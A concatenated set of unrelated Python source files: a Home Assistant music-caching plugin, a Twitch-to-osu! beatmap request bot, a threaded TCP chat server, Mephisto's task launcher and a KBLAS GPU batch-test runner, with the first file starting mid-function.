"url": 'http://lhttp.qingting.fm/live/' + str(item['id']) + '/64k.mp3',
"song": item['title'],
"singer": '蜻蜓FM'
}, filter_list)
# Call the service to start playback
await self.media.play_media('music_playlist', list(_newlist))
###################### Cache to the local music library ######################
async def cache_file(self, url, file_name):
hass = self.hass
path = hass.config.path("media/ha_cloud_music")
# Replace special characters in the file name with underscores
rstr = r"[\/\\\:\*\?\"\<\>\|]"
name = re.sub(rstr, "_", file_name)
file_path = os.path.join(path, name + '.mp3')
print('[Caching file] ' + file_path)
thread = threading.Thread(target=urllib.request.urlretrieve, args=(url, file_path))
thread.start()
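# e.g. cache_file(url, 'Song: A/B') (illustrative name) saves the download as
# media/ha_cloud_music/Song_ A_B.mp3 - every /\:*?"<>| character becomes an underscore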
###################### Get the local music library ######################
def get_local_media_list(self, search_type):
file_path = ''
singer = "默认列表"
if search_type != 'library_music':
file_path = search_type.replace('library_', '')
singer = file_path
hass = self.hass
children = []
base_url = get_url(hass).strip('/')
path = hass.config.path("media/ha_cloud_music")
# Gather all files
file_dir = os.path.join(path, file_path)
for filename in os.listdir(file_dir):
if os.path.isfile(os.path.join(file_dir, filename)) and '.mp3' in filename:
songid = f"{base_url}/media-local/"
if file_path != '':
songid += urllib.parse.quote(f"{file_path}/{filename}")
else:
songid += urllib.parse.quote(filename)
song = filename.replace('.mp3', '')
children.append({
"name": song,
"song": song,
"singer": singer,
"album": "媒体库",
"image": f"{base_url}/static/icons/favicon-192x192.png",
"type": "url",
"url": songid
})
return children
|
twitch_bot.py | import datetime
import logging
import os
import time
from abc import ABC
from threading import Thread
from typing import AnyStr, Tuple, Union, List
import aiohttp
from twitchio import Message, Channel, Chatter
from twitchio.ext import commands, routines
from bots.irc_bot import IrcBot
from helpers.beatmap_link_parser import parse_beatmap_link
from helpers.database_helper import UserDatabase, StatisticsDatabase
from helpers.osu_api_helper import OsuApi
from helpers.utils import convert_seconds_to_readable
logger = logging.getLogger('ronnia')
class TwitchBot(commands.Bot, ABC):
PER_REQUEST_COOLDOWN = 30 # each request has 30 seconds cooldown
BEATMAP_STATUS_DICT = {"0": 'Pending',
"1": 'Ranked',
"2": 'Approved',
"3": 'Qualified',
"4": 'Loved',
"-1": 'WIP',
"-2": 'Graveyard'}
def __init__(self, initial_channel_ids: List[int]):
self.users_db = UserDatabase()
self.messages_db = StatisticsDatabase()
self.initial_channel_ids = initial_channel_ids
self.all_user_details = []
args = {
'token': os.getenv('TMI_TOKEN'),
'client_id': os.getenv('CLIENT_ID'),
'client_secret': os.getenv('CLIENT_SECRET'),
'prefix': os.getenv('BOT_PREFIX')
}
super().__init__(**args)
self.main_prefix = None
self.osu_api = OsuApi(self.messages_db)
self.user_last_request = {}
self.irc_bot = IrcBot("#osu", os.getenv('OSU_USERNAME'), "irc.ppy.sh", password=os.getenv("IRC_PASSWORD"))
self.irc_bot_thread = Thread(target=self.irc_bot.start)
self.join_channels_first_time = True
@staticmethod
async def _get_access_token():
client_id = os.getenv('CLIENT_ID')
client_secret = os.getenv('CLIENT_SECRET')
grant_type = 'client_credentials'
scope = 'chat:read chat:edit'
payload = {'client_id': client_id,
'client_secret': client_secret,
'grant_type': grant_type,
'scope': scope}
async with aiohttp.ClientSession() as session:
async with session.post('https://id.twitch.tv/oauth2/token', data=payload) as resp:
response_json = await resp.json()
return response_json['access_token']
async def event_message(self, message: Message):
if message.author is None:
return
await self.handle_commands(message)
try:
await self.check_channel_enabled(message.channel.name)
await self.handle_request(message)
except AssertionError as e:
logger.debug(f'Check unsuccessful: {e}')
await self.messages_db.add_error('internal_check', str(e))
async def handle_request(self, message: Message):
logger.info(f"{message.channel.name} - {message.author.name}: {message.content}")
given_mods, api_params = self._check_message_contains_beatmap_link(message)
if given_mods is not None:
await self._check_user_cooldown(message.author)
beatmap_info = await self.osu_api.get_beatmap_info(api_params)
if beatmap_info:
await self.check_request_criteria(message, beatmap_info)
await self._update_channel(message)
# If user has enabled echo setting, send twitch chat a message
if await self.users_db.get_echo_status(twitch_username=message.channel.name):
await self._send_twitch_message(message, beatmap_info)
await self._send_irc_message(message, beatmap_info, given_mods)
await self.messages_db.add_request(requested_beatmap_id=int(beatmap_info['beatmap_id']),
requested_channel_name=message.channel.name,
requester_channel_name=message.author.name,
mods=given_mods)
async def inform_user_on_updates(self, osu_username: str, twitch_username: str, is_updated: bool):
if not is_updated:
message_txt_path = os.path.join(os.getenv('DB_DIR'), 'update_message.txt')
if os.path.exists(message_txt_path):
with open(message_txt_path) as f:
update_message = f.read().strip()
self.irc_bot.send_message(osu_username, update_message)
else:
logger.warning(f'Looking for {message_txt_path}, but it does not exist!')
await self.users_db.set_channel_updated(twitch_username)
return
async def check_beatmap_star_rating(self, message: Message, beatmap_info):
twitch_username = message.channel.name
requester_name = message.author.name
diff_rating = float(beatmap_info['difficultyrating'])
range_low, range_high = await self.users_db.get_range_setting(twitch_username=twitch_username, setting_key='sr')
if range_low == -1 or range_high == -1:
return
assert range_low < diff_rating < range_high, \
f'@{requester_name} Streamer is accepting requests between {range_low:.1f}-{range_high:.1f}* difficulty.' \
f' Your map is {diff_rating:.1f}*.'
return
async def check_request_criteria(self, message: Message, beatmap_info: dict):
test_status = await self.users_db.get_test_status(message.channel.name)
if not test_status:
await self.check_sub_only_mode(message)
await self.check_cp_only_mode(message)
await self.check_user_excluded(message)
await self.check_if_author_is_broadcaster(message)
await self.check_if_streaming_osu(message.channel)
try:
await self.check_beatmap_star_rating(message, beatmap_info)
except AssertionError as e:
await message.channel.send(str(e))
raise AssertionError
async def check_user_excluded(self, message: Message):
excluded_users = await self.users_db.get_excluded_users(twitch_username=message.channel.name, return_mode='list')
assert message.author.name.lower() not in excluded_users, f'{message.author.name} is excluded'
async def check_sub_only_mode(self, message: Message):
is_sub_only = await self.users_db.get_setting('sub-only', message.channel.name)
if is_sub_only:
assert message.author.is_mod or message.author.is_subscriber != '0' or 'vip' in message.author.badges, \
'Subscriber only request mode is active.'
async def check_cp_only_mode(self, message):
is_cp_only = await self.users_db.get_setting('cp-only', message.channel.name)
if is_cp_only:
assert 'custom-reward-id' in message.tags, 'Channel Points only mode is active.'
return
async def event_command_error(self, ctx, error):
logger.error(error)
await self.messages_db.add_error(error_type='twitch_command_error', error_text=str(error))
async def _update_channel(self, message: Message):
"""
Updates the user about news
"""
logger.info('Updating user with the latest news!')
# Get current channel details from db
channel_details = await self.users_db.get_user_from_twitch_username(twitch_username=message.channel.name)
twitch_username = channel_details['twitch_username']
is_channel_updated = channel_details['enabled']
await self.inform_user_on_updates(channel_details['osu_username'], twitch_username, is_channel_updated)
return
async def get_osu_and_twitch_details(self, osu_user_id_or_name, twitch_user_id=None, twitch_username=None):
assert twitch_user_id is not None or twitch_username is not None, \
'Twitch user id or twitch username must be given.'
if osu_user_id_or_name.isdigit():
# Handle ids in the string form
osu_user_id_or_name = int(osu_user_id_or_name)
# Get osu! username from osu! api (usernames can change)
osu_user_info = await self.osu_api.get_user_info(osu_user_id_or_name)
# Get twitch username from twitch api
if twitch_user_id is None:
twitch_info = await self.fetch_users(names=[twitch_username])
else:
twitch_info = await self.fetch_users(ids=[twitch_user_id])
return osu_user_info, twitch_info
@staticmethod
async def check_if_author_is_broadcaster(message: Message):
assert message.author.name != message.channel.name, 'Author is broadcaster and not in test mode.'
return
async def global_before_hook(self, ctx):
"""
Global hook that runs before every command.
:param ctx: Message context
:return:
"""
user = await self.users_db.get_user_from_twitch_username(ctx.author.name)
assert user is not None, 'User does not exist'
assert ctx.message.channel.name == ctx.author.name, 'Message is not in author\'s channel'
async def check_if_streaming_osu(self, channel: Channel):
"""
Checks if stream is on and they're playing osu!, otherwise ignores channel.
:param channel: Channel of the message
:return:
"""
stream_list = await self.fetch_streams(user_logins=[channel.name])
assert len(stream_list) == 1, f'{channel.name} stream is not on.'
stream = stream_list[0]
assert stream.game_name == 'osu!', f'{channel.name} stream is not playing osu!'
return
async def check_channel_enabled(self, channel_name):
enabled = await self.users_db.get_enabled_status(twitch_username=channel_name)
assert enabled, f'Channel:{channel_name} is not open for requests'
async def _check_user_cooldown(self, author: Chatter):
"""
Check if user is on cooldown, raise an exception if the user is on request cooldown.
:param author: Twitch user object
:return: Exception if user has requested a beatmap before TwitchBot.PER_REQUEST_COOLDOWN seconds passed.
"""
author_id = author.id
time_right_now = datetime.datetime.now()
await self._prune_cooldowns(time_right_now)
if author_id not in self.user_last_request:
self.user_last_request[author_id] = time_right_now
else:
last_message_time = self.user_last_request[author_id]
seconds_since_last_request = (time_right_now - last_message_time).total_seconds()
assert seconds_since_last_request >= TwitchBot.PER_REQUEST_COOLDOWN, \
f'{author.name} is on cooldown.'
self.user_last_request[author_id] = time_right_now
return
async def _prune_cooldowns(self, time_right_now: datetime.datetime):
"""
Prunes users on that are on cooldown list so it doesn't get too cluttered.
:param time_right_now:
:return:
"""
pop_list = []
for user_id, last_message_time in self.user_last_request.items():
seconds_since_last_request = (time_right_now - last_message_time).total_seconds()
if seconds_since_last_request >= TwitchBot.PER_REQUEST_COOLDOWN:
pop_list.append(user_id)
for user in pop_list:
self.user_last_request.pop(user)
return
async def _send_irc_message(self, message: Message, beatmap_info: dict, given_mods: str):
"""
Sends the beatmap request message to osu!irc bot
:param message: Twitch Message object
:param beatmap_info: Dictionary containing beatmap information from osu! api
:param given_mods: String of mods if they are requested, empty string instead
:return:
"""
irc_message = await self._prepare_irc_message(message, beatmap_info, given_mods)
irc_target_channel = (await self.users_db.get_user_from_twitch_username(message.channel.name))['osu_username']
self.irc_bot.send_message(irc_target_channel, irc_message)
return
@staticmethod
async def _send_twitch_message(message: Message, beatmap_info: dict):
"""
Sends twitch feedback message
:param message: Twitch Message object
:param beatmap_info: Dictionary containing beatmap information from osu! api
:return:
"""
artist = beatmap_info['artist']
title = beatmap_info['title']
version = beatmap_info['version']
bmap_info_text = f"{artist} - {title} [{version}]"
await message.channel.send(f"{bmap_info_text} - Request sent!")
return
@staticmethod
def _check_message_contains_beatmap_link(message: Message) -> Tuple[Union[AnyStr, None], Union[dict, None]]:
"""
Splits message by space character and checks for possible beatmap links
:param message: Twitch Message object
:return:
"""
logger.debug("Checking if message contains beatmap link")
content = message.content
for candidate_link in content.split(' '):
result, mods = parse_beatmap_link(candidate_link, content)
if result:
logger.debug(f"Found beatmap id: {result}")
return mods, result
else:
logger.debug("Couldn't find beatmap in message")
return None, None
async def _prepare_irc_message(self, message: Message, beatmap_info: dict, given_mods: str):
"""
Prepare beatmap request message to send to osu!irc.
:param message: Twitch message
:param beatmap_info: Beatmap info taken from osu!api as dictionary
:param given_mods: Mods as string
:return:
"""
artist = beatmap_info['artist']
title = beatmap_info['title']
version = beatmap_info['version']
bpm = beatmap_info['bpm']
beatmap_status = self.BEATMAP_STATUS_DICT[beatmap_info['approved']]
difficultyrating = float(beatmap_info['difficultyrating'])
beatmap_id = beatmap_info['beatmap_id']
beatmap_length = convert_seconds_to_readable(beatmap_info['hit_length'])
beatmap_info = f"[http://osu.ppy.sh/b/{beatmap_id} {artist} - {title} [{version}]] ({bpm} BPM, {difficultyrating:.2f}*, {beatmap_length}) {given_mods}"
extra_postfix = ""
extra_prefix = ""
# TODO: Check if this issue is fixed in next twitchio
try:
badges = message.author.badges
except ValueError:
badges = []
if message.author.is_mod:
extra_prefix += "[MOD] "
elif message.author.is_subscriber != '0':
# TODO: Check if this conditional changed in the next releases of tio
extra_prefix += "[SUB] "
elif 'vip' in badges:
extra_prefix += "[VIP] "
if 'custom-reward-id' in message.tags:
extra_postfix += "+ USED POINTS"
return f"{extra_prefix}{message.author.name} -> [{beatmap_status}] {beatmap_info} {extra_postfix}"
async def event_ready(self):
self.main_prefix = self._prefix
await self.users_db.initialize()
await self.messages_db.initialize()
logger.info('Successfully initialized databases!')
# TODO: Fix here
# self.all_user_details = await self.users_db.get_all_users()
# self.initial_channel_ids = [user['twitch_id'] for user in self.all_user_details]
logger.debug(f'Populating users: {self.initial_channel_ids}')
# Get channel names from ids
list_batcher = lambda sample_list, chunk_size: [sample_list[i:i + chunk_size] for i in
range(0, len(sample_list), chunk_size)]
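# e.g. list_batcher([1, 2, 3, 4, 5], 2) -> [[1, 2], [3, 4], [5]]; used below to
# request user details in chunks of 100 ids per fetch_users call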
channel_names = []
for batch in list_batcher(self.initial_channel_ids, 100):
channel_names.extend(await self.fetch_users(ids=batch))
channels_to_join = [ch.name for ch in channel_names]
if self.nick not in channels_to_join:
channels_to_join.append(self.nick)
logger.debug(f'Joining channels: {channels_to_join}')
# Join channels
channel_join_start = time.time()
await self.join_channels(channels_to_join)
logger.debug(f'Joined all channels after {time.time() - channel_join_start:.2f}s')
# Start update users routine
self.update_users.start()
self.join_channels_routine.start()
initial_extensions = ['cogs.request_cog', 'cogs.admin_cog']
for extension in initial_extensions:
self.load_module(extension)
logger.debug(f'Successfully loaded: {extension}')
logger.info(f'Ready | {self.nick}')
@routines.routine(hours=1)
async def update_users(self):
logger.info('Started updating user routine')
user_details = await self.users_db.get_all_users()
channel_ids = [ch['twitch_id'] for ch in user_details]
channel_details = await self.fetch_users(ids=channel_ids)
# Remove banned twitch users from database
if len(user_details) != len(channel_details):
logger.warning('There\'s a banned user.')
logger.info(f'Users in database vs from twitch api: {len(user_details)} - {len(channel_details)}.')
banned_users = set([user['twitch_id'] for user in user_details]).difference(
set([str(user.id) for user in channel_details]))
logger.info(f'Banned user ids: {banned_users}')
new_user_details = []
for user in user_details:
if user['twitch_id'] in banned_users:
await self.users_db.remove_user(user['twitch_username'])
else:
new_user_details.append(user)
user_details = new_user_details.copy()
user_details.sort(key=lambda x: int(x['twitch_id']))
channel_details.sort(key=lambda x: x.id)
for db_user, new_twitch_user in zip(user_details, channel_details):
try:
osu_details = await self.osu_api.get_user_info(db_user['osu_username'])
except aiohttp.ClientError as client_error:
logger.error(client_error)
osu_details = {'user_id': db_user['osu_id'],
'username': db_user['osu_username']}
# Remove banned osu! users from database
if osu_details is None:
await self.users_db.remove_user(twitch_username=db_user['twitch_username'])
continue
new_twitch_username = new_twitch_user.name.lower()
new_osu_username = osu_details['username'].lower().replace(' ', '_')
twitch_id = new_twitch_user.id
osu_user_id = osu_details['user_id']
if new_osu_username != db_user['osu_username'] or new_twitch_username != db_user['twitch_username']:
logger.info(f'Username change:')
logger.info(f'osu! old: {db_user["osu_username"]} - new: {new_osu_username}')
logger.info(f'Twitch old: {db_user["twitch_username"]} - new: {new_twitch_username}')
await self.users_db.update_user(new_twitch_username=new_twitch_username,
new_osu_username=new_osu_username,
twitch_id=twitch_id,
osu_user_id=osu_user_id)
@routines.routine(hours=1)
async def join_channels_routine(self):
logger.debug('Started join channels routine')
if self.join_channels_first_time:
self.join_channels_first_time = False
return
all_user_details = await self.users_db.get_all_users()
twitch_users = [user['twitch_username'] for user in all_user_details]
logger.debug(f'Joining: {twitch_users}')
await self.join_channels(twitch_users)
async def close(self):
logger.info('Closing bot')
self.update_users.cancel()
self.join_channels_routine.cancel()
await self.users_db.close()
await self.messages_db.close()
self._connection._keeper.cancel()
self._connection.is_ready.clear()
futures = self._connection._fetch_futures()
for fut in futures:
fut.cancel()
if self._connection._websocket:
await self._connection._websocket.close()
if self._connection._client._http.session:
await self._connection._client._http.session.close()
self._connection._loop.stop()
|
server.py | import sys
import os
from datetime import datetime
from threading import Thread
from socket import socket, AF_INET, SOCK_STREAM
# invalid arguments
if len(sys.argv) < 2:
print("Invalid inputs. Please stick to the format shown below.")
print("$ python3 client.py <portnumber>")
print("portnumber: the port of the chatroom server.")
sys.exit(0)
# define server address
server_name = "127.0.0.1"
server_port = int(sys.argv[1])
# create a new TCP socket and bind it to server address
server_socket = socket(AF_INET, SOCK_STREAM)
server_socket.bind((server_name, server_port))
# start listening on the bound port
server_socket.listen(1)
print(f"TCP server is listening on port {server_port}.")
peers = []
def newUser(conn_socket: socket):
name: str = conn_socket.recv(1024).decode()
# alert peers about new connection
for peer in peers:
if peer != conn_socket:
peer.send(f"{name} has joined the chat\n".encode())
while True:
# receive the message and broadcast it in the network
msg: str = conn_socket.recv(1024).decode()
if not msg:
# peer disconnected without sending "bye"; drop the socket
peers.remove(conn_socket)
conn_socket.close()
return
time = datetime.now().strftime("%H:%M:%S")
# broadcast the data to all peers in the network
for peer in peers:
if peer != conn_socket:
timed_msg = f"[{time}] {name}\n" + msg
peer.send(timed_msg.encode())
# terminate server-side connection with user
if msg == "bye\n":
peers.remove(conn_socket)
conn_socket.close()
return
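# Illustrative client counterpart (assumed usage, not part of this server):
# a peer sends its display name first, then newline-terminated messages,
# and "bye\n" ends the session. Defined here for reference only; the server
# never calls it.
def example_client(port: int):
    sock = socket(AF_INET, SOCK_STREAM)
    sock.connect(("127.0.0.1", port))
    sock.send("alice".encode())             # first send registers the name
    sock.send("hello everyone\n".encode())  # broadcast to the other peers
    sock.send("bye\n".encode())             # server closes this connection
    sock.close()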
while True:
try:
# a new client request received on server_port
# once accepted, a random port is assigned for further communication
conn_socket, _ = server_socket.accept()
peers.append(conn_socket)
# create a thread and start its execution
Thread(target=newUser, args=(conn_socket,)).start()
except KeyboardInterrupt:
# alert clients to close their connection
for peer in peers:
peer.send("__SERVER_ERROR__".encode())
server_socket.close()
print("Server has stopped listening.")
# current process is stopped, any spawned threads are also killed
os._exit(0)
|
task_launcher.py | #!/usr/bin/env python3
# Copyright (c) Facebook, Inc. and its affiliates.
# This source code is licensed under the MIT license found in the
# LICENSE file in the root directory of this source tree.
# TODO(#99) do we standardize some kinds of data loader formats? perhaps
# one that loads from files, and then an arbitrary kind? Simple
# interface could be like an iterator. This class will launch tasks
# as if the loader is an iterator.
from mephisto.data_model.assignment import (
Assignment,
InitializationData,
AssignmentState,
)
from mephisto.data_model.unit import Unit
from typing import Dict, Optional, List, Any, TYPE_CHECKING, Iterator
from tqdm import tqdm
import os
import time
import enum
if TYPE_CHECKING:
from mephisto.data_model.task_run import TaskRun
from mephisto.abstractions.database import MephistoDB
import threading
from mephisto.operations.logger_core import get_logger
import types
logger = get_logger(name=__name__)
UNIT_GENERATOR_WAIT_SECONDS = 10
ASSIGNMENT_GENERATOR_WAIT_SECONDS = 0.5
class GeneratorType(enum.Enum):
NONE = 0
UNIT = 1
ASSIGNMENT = 2
class TaskLauncher:
"""
This class is responsible for managing the process of registering
and launching units, including the steps for pre-processing
data and storing them locally for assignments when appropriate.
"""
def __init__(
self,
db: "MephistoDB",
task_run: "TaskRun",
assignment_data_iterator: Iterator[InitializationData],
max_num_concurrent_units: int = 0,
):
"""Prepare the task launcher to get it ready to launch the assignments"""
self.db = db
self.task_run = task_run
self.assignment_data_iterable = assignment_data_iterator
self.assignments: List[Assignment] = []
self.units: List[Unit] = []
self.provider_type = task_run.get_provider().PROVIDER_TYPE
self.max_num_concurrent_units = max_num_concurrent_units
self.launched_units: Dict[str, Unit] = {}
self.unlaunched_units: Dict[str, Unit] = {}
self.keep_launching_units: bool = False
self.finished_generators: bool = False
self.assignment_thread_done: bool = True
self.unlaunched_units_access_condition = threading.Condition()
if isinstance(self.assignment_data_iterable, types.GeneratorType):
self.generator_type = GeneratorType.ASSIGNMENT
self.assignment_thread_done = False
elif max_num_concurrent_units != 0:
self.generator_type = GeneratorType.UNIT
else:
self.generator_type = GeneratorType.NONE
run_dir = task_run.get_run_dir()
os.makedirs(run_dir, exist_ok=True)
logger.debug(f"type of assignment data: {type(self.assignment_data_iterable)}")
self.units_thread = None
self.assignments_thread = None
def _create_single_assignment(self, assignment_data) -> None:
"""Create a single assignment in the database using its read assignment_data"""
task_run = self.task_run
task_config = task_run.get_task_config()
assignment_id = self.db.new_assignment(
task_run.task_id,
task_run.db_id,
task_run.requester_id,
task_run.task_type,
task_run.provider_type,
task_run.sandbox,
)
assignment = Assignment(self.db, assignment_id)
assignment.write_assignment_data(assignment_data)
self.assignments.append(assignment)
unit_count = len(assignment_data.unit_data)
for unit_idx in range(unit_count):
unit_id = self.db.new_unit(
task_run.task_id,
task_run.db_id,
task_run.requester_id,
assignment_id,
unit_idx,
task_config.task_reward,
task_run.provider_type,
task_run.task_type,
task_run.sandbox,
)
self.units.append(Unit(self.db, unit_id))
with self.unlaunched_units_access_condition:
self.unlaunched_units[unit_id] = Unit(self.db, unit_id)
def _try_generating_assignments(self) -> None:
"""Try to generate more assignments from the assignments_data_iterator"""
while not self.finished_generators:
try:
data = next(self.assignment_data_iterable)
self._create_single_assignment(data)
except StopIteration:
self.assignment_thread_done = True
time.sleep(ASSIGNMENT_GENERATOR_WAIT_SECONDS)
def create_assignments(self) -> None:
"""Create an assignment and associated units for the generated assignment data"""
self.keep_launching_units = True
if self.generator_type != GeneratorType.ASSIGNMENT:
for data in self.assignment_data_iterable:
self._create_single_assignment(data)
else:
self.assignments_thread = threading.Thread(
target=self._try_generating_assignments,
args=(),
name="assignment-generator",
)
self.assignments_thread.start()
def generate_units(self):
"""units generator which checks that only 'max_num_concurrent_units' running at the same time,
i.e. in the LAUNCHED or ASSIGNED states"""
while self.keep_launching_units:
units_id_to_remove = []
for db_id, unit in self.launched_units.items():
status = unit.get_status()
if (
status != AssignmentState.LAUNCHED
and status != AssignmentState.ASSIGNED
):
units_id_to_remove.append(db_id)
for db_id in units_id_to_remove:
self.launched_units.pop(db_id)
num_avail_units = self.max_num_concurrent_units - len(self.launched_units)
num_avail_units = (
len(self.unlaunched_units)
if self.max_num_concurrent_units == 0
else num_avail_units
)
units_id_to_remove = []
for i, item in enumerate(self.unlaunched_units.items()):
db_id, unit = item
if i < num_avail_units:
self.launched_units[unit.db_id] = unit
units_id_to_remove.append(db_id)
yield unit
else:
break
with self.unlaunched_units_access_condition:
for db_id in units_id_to_remove:
self.unlaunched_units.pop(db_id)
time.sleep(UNIT_GENERATOR_WAIT_SECONDS)
if not self.unlaunched_units:
break
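# Example of the cap enforced by generate_units above (illustrative):
# with max_num_concurrent_units=5 and 3 units still LAUNCHED/ASSIGNED,
# one pass yields at most 2 new units; with max_num_concurrent_units=0
# every unlaunched unit is yielded.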
def _launch_limited_units(self, url: str) -> None:
"""use units' generator to launch limited number of units according to (max_num_concurrent_units)"""
# Continue launching if we haven't pulled the plug, so long as there are currently
# units to launch, or more may come in the future.
while not self.finished_generators and (
len(self.unlaunched_units) > 0 or not self.assignment_thread_done
):
for unit in self.generate_units():
if unit is None:
break
unit.launch(url)
if self.generator_type == GeneratorType.NONE:
break
self.finished_generators = True
def launch_units(self, url: str) -> None:
"""launch any units registered by this TaskLauncher"""
self.units_thread = threading.Thread(
target=self._launch_limited_units, args=(url,), name="unit-generator"
)
self.units_thread.start()
def get_assignments_are_all_created(self) -> bool:
return self.assignment_thread_done
def expire_units(self) -> None:
"""Clean up all units on this TaskLauncher"""
self.keep_launching_units = False
self.finished_generators = True
for unit in tqdm(self.units):
try:
unit.expire()
except Exception as e:
logger.exception(
f"Warning: failed to expire unit {unit.db_id}. Stated error: {e}",
exc_info=True,
)
def shutdown(self) -> None:
"""Clean up running threads for generating assignments and units"""
self.assignment_thread_done = True
self.keep_launching_units = False
self.finished_generators = True
if self.assignments_thread is not None:
self.assignments_thread.join()
if self.units_thread is not None:
self.units_thread.join()
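# A minimal lifecycle sketch (assumed caller code, not part of this module),
# showing the order in which a TaskLauncher is normally driven:
#
#     launcher = TaskLauncher(db, task_run, iter(assignment_data))
#     launcher.create_assignments()    # write assignments/units (or start
#                                      # the assignment-generator thread)
#     launcher.launch_units(task_url)  # background thread launches units
#     ...                              # wait for the run to complete
#     launcher.expire_units()          # expire anything still outstanding
#     launcher.shutdown()              # join the generator threads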
|
kblas-test-batch-parallel.py | #! /usr/bin/env python
# -*- coding: utf-8 -*-
import os, sys, getopt
import csv
import time
import commands
import threading
# create output log folder
KBLAS_HOME='.'
TEST_LOGS_PATH='kblas-test-log'
cmd = ('cd '+KBLAS_HOME+'; mkdir -p '+TEST_LOGS_PATH)
print cmd
sys.stdout.flush()
os.system(cmd)
BIN_PATH='./testing/bin/'
if (not os.path.isdir(BIN_PATH)):
print 'Unable to find executables folder! Exiting'
exit()
#detect GPU devices
NGPUS=0
# first check using environment variable
if ( "CUDA_VISIBLE_DEVICES" in os.environ ):
aux=os.environ["CUDA_VISIBLE_DEVICES"].strip(',')
if ( len(aux) > 0):
NGPUS=int( aux.count(',') ) + 1
if ( NGPUS == 0 ):
# check using system
cmd=('nvidia-smi -L | wc -l')
NGPUS = int(commands.getstatusoutput(cmd)[1])
if (NGPUS < 1):
print 'Unable to detect an NVIDIA GPU device to test on! Exiting'
exit()
print 'NGPUS: ' + str(NGPUS)
#set options
#check = ''
check = ' -c'
defaultBatchCount = 100
TEST_BATCH_SVD = 1
TEST_BATCH_QR = 1
TEST_BATCH_QR_V = 1
TEST_BATCH_GEQP = 1
TEST_BATCH_TRSM = 1
TEST_BATCH_TRMM = 1
TEST_BATCH_GEMM = 1
TEST_BATCH_SYRK = 1
TEST_BATCH_POTRF = 1
TEST_BATCH_LAUUM = 1
TEST_BATCH_TRTRI = 1
TEST_BATCH_POTRS = 1
TEST_BATCH_POTRI = 1
TEST_BATCH_POTI = 1
TEST_BATCH_POSV = 1
TEST_BATCH_ARA = 1
#--------------------------------
def task1(pVariants, pRanges, pExec, pOptions, pBatchCount, pDev, pOutfile):
print 'running: '+pExec+' ... '
os.system('echo running: '+pExec+' > '+pOutfile)
for v in pVariants:
for r in pRanges:
cmd = (pExec+' '+ r + ' ' + pOptions + ' --dev ' + str(pDev) + ' ' + v + ' --batchCount ' + str(pBatchCount))
os.system('echo >> '+pOutfile)
os.system('echo '+cmd+' >> '+pOutfile)
sys.stdout.flush()
os.system(cmd+' >> '+pOutfile)
time.sleep(1)
print pExec+' done'
#--------------------------------
def launchQueue(*taskQueue):
for t in taskQueue:
t.start()
t.join()
#--------------------------------
def parallelTaskLaunch(variants, programs, ranges, options, batchCount):
deviceQueue = [[] for _ in xrange(NGPUS)]
deviceThread = []
dev = 0
for p in programs:
pp = BIN_PATH+p
if (not os.path.isfile(pp)):
print 'Unable to find '+pp+' executable! Skipping...'
else:
logFile = TEST_LOGS_PATH+'/'+p+'.txt'
deviceQueue[dev].append( threading.Thread(target=task1, args=(variants, ranges, pp, options, batchCount, dev, logFile)) )
dev = (dev+1)%NGPUS
dev = 0
while dev < NGPUS:
q = deviceQueue[dev]
#print q
tq = threading.Thread( target=launchQueue, args=tuple(q) )  # unpack the queue into launchQueue's *taskQueue
deviceThread.append(tq)
tq.start()
dev = dev + 1
dev = 0
while dev < NGPUS:
tq = deviceThread[dev]
tq.join()
dev = dev + 1
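#--------------------------------
# Scheduling note (illustrative): programs are dealt round-robin across GPUs,
# e.g. with NGPUS=2 and programs [a, b, c, d] the queues become
# device 0 -> [a, c] and device 1 -> [b, d]; each device queue runs its
# tasks serially while the per-device queues run in parallel.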
############### BATCH_SVD
if (TEST_BATCH_SVD == 1):
variants = ['']
programs = ['test_dgesvj_batch', 'test_sgesvj_batch']
ranges = ['--range 32:512:32']
options = ''
batchCount = defaultBatchCount;
parallelTaskLaunch(variants, programs, ranges, options, batchCount)
############### BATCH_QR
if (TEST_BATCH_QR == 1):
variants = ['']
programs = ['test_dgeqrf_batch', 'test_sgeqrf_batch']
ranges = ['--range 32:512:32']
batchCount = defaultBatchCount;
options = ''
parallelTaskLaunch(variants, programs, ranges, options, batchCount)
############### BATCH_QR_V
if (TEST_BATCH_QR_V == 1):
variants = ['']
programs = ['test_dtsqrt_vbatch', 'test_stsqrt_vbatch']
ranges = ['--range 32:256:32']
batchCount = defaultBatchCount;
options = ''
parallelTaskLaunch(variants, programs, ranges, options, batchCount)
############### BATCH_GEQP
if (TEST_BATCH_GEQP == 1):
variants = ['']
programs = ['test_dgeqp2_batch', 'test_sgeqp2_batch']
ranges = ['--range 32:256:32']
batchCount = defaultBatchCount;
options = ''
parallelTaskLaunch(variants, programs, ranges, options, batchCount)
############### BATCH_ARA
if (TEST_BATCH_ARA == 1):
variants = ['']
programs = ['test_dara_batch', 'test_sara_batch']
ranges = ['--range 64:256:32']
batchCount = defaultBatchCount;
options = ''
parallelTaskLaunch(variants, programs, ranges, options, batchCount)
############### BATCH_GEMM
if (TEST_BATCH_GEMM == 1):
variants = ['-NN',
'-TN',
'-NT',
'-TT',
]
programs = ['test_sgemm_batch',
'test_dgemm_batch',
'test_cgemm_batch',
'test_zgemm_batch'
]
ranges = [
'--range 2:70+1',
'--range 32:256:32'
]
options = check
batchCount = defaultBatchCount;
parallelTaskLaunch(variants, programs, ranges, options, batchCount)
############### BATCH_TRMM
if (TEST_BATCH_TRMM == 1):
variants = ['-L -NN -DN',
'-L -TN -DN',
# '-SL -U -NN -DN',
# '-SL -U -TN -DN',
# '-SR -L -NN -DN',
# '-SR -L -TN -DN',
# '-SR -U -NN -DN',
# '-SR -U -TN -DN'
]
programs = ['test_strmm_batch',
'test_dtrmm_batch',
'test_ctrmm_batch',
'test_ztrmm_batch'
]
ranges = [
'--range 2:70+1',
'--range 32:256:32'
]
options = check
batchCount = defaultBatchCount;
parallelTaskLaunch(variants, programs, ranges, options, batchCount)
############### BATCH_TRSM
if (TEST_BATCH_TRSM == 1):
variants = ['-SL -L -NN -DN',
'-SL -L -TN -DN',
# '-SL -U -NN -DN',
# '-SL -U -TN -DN',
'-SR -L -NN -DN',
'-SR -L -TN -DN',
# '-SR -U -NN -DN',
# '-SR -U -TN -DN'
]
programs = ['test_strsm_batch',
'test_dtrsm_batch',
'test_ctrsm_batch',
'test_ztrsm_batch'
]
ranges = [
'--range 2:70+1',
'--range 32:256:32'
]
options = check
batchCount = defaultBatchCount;
parallelTaskLaunch(variants, programs, ranges, options, batchCount)
############### BATCH_SYRK
if (TEST_BATCH_SYRK == 1):
variants = ['-L -NN',
'-L -TN',
# '-U -NN',
# '-U -TN',
]
programs = ['test_ssyrk_batch',
